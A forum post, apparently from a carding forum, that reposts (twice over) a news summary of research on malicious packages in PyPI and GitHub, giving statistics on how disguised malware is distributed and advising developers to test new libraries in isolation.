Carding
Professional
- Messages
- 2,870
- Reaction score
- 2,511
- Points
- 113
It turns out that the PyPI and GitHub repositories contain many mysteries.
Python is considered to be one of the most flexible programming languages. Compatibility with various platforms and technologies makes it particularly popular. However, these same functions can be potentially dangerous and play a cruel joke with the developer. What is the threat?
Experts from China and Singapore conducted a study and found out that dangerous malicious code is being distributed in the PyPI ecosystem (Python Package Index — Python repository). In the course of studying 1,556 malicious and 549 randomly selected secure packages, it was possible to evaluate the mechanisms of the former and their potential goals.
It is noted that the GitHub repository has the same problem. If on average 2 dangerous files were found in PyPI, located "no deeper" than the third folder in the directory hierarchy, then an average of 23 malicious files with a depth of 17 folders were found in projects on GitHub.
However, this does not mean that suspicious PyPI programs are less of a threat. In 43% of the analyzed elements, 90% of the code or more was made up of a well-disguised malicious module.
Such packages are usually smaller in size or, at first glance, contain fewer malicious elements, because the most dangerous parts of the code are loaded after the program has started working
The most common technique used by attackers was the execution of arbitrary commands — it was used by more than 59% of the studied packages. The next most popular method is data theft and file modification.
Louis Lang, chief technology officer of Phylum startup, spoke on this topic at the HackerNews forum. He believes that in the near future, cybersecurity experts and malware creators will be in a constant "arms race". While threat detection methods will improve, attackers will probably also change tactics.
Almost all large companies have powerful cyber defense tools and attract the best experts in this field. However, developers who want to try out new libraries should first test them in an isolated, secure environment.
Python is considered to be one of the most flexible programming languages. Compatibility with various platforms and technologies makes it particularly popular. However, these same functions can be potentially dangerous and play a cruel joke with the developer. What is the threat?
Experts from China and Singapore conducted a study and found out that dangerous malicious code is being distributed in the PyPI ecosystem (Python Package Index — Python repository). In the course of studying 1,556 malicious and 549 randomly selected secure packages, it was possible to evaluate the mechanisms of the former and their potential goals.
It is noted that the GitHub repository has the same problem. If on average 2 dangerous files were found in PyPI, located "no deeper" than the third folder in the directory hierarchy, then an average of 23 malicious files with a depth of 17 folders were found in projects on GitHub.
However, this does not mean that suspicious PyPI programs are less of a threat. In 43% of the analyzed elements, 90% of the code or more was made up of a well-disguised malicious module.
Such packages are usually smaller in size or, at first glance, contain fewer malicious elements, because the most dangerous parts of the code are loaded after the program has started working
The most common technique used by attackers was the execution of arbitrary commands — it was used by more than 59% of the studied packages. The next most popular method is data theft and file modification.
Louis Lang, chief technology officer of Phylum startup, spoke on this topic at the HackerNews forum. He believes that in the near future, cybersecurity experts and malware creators will be in a constant "arms race". While threat detection methods will improve, attackers will probably also change tactics.
Almost all large companies have powerful cyber defense tools and attract the best experts in this field. However, developers who want to try out new libraries should first test them in an isolated, secure environment.
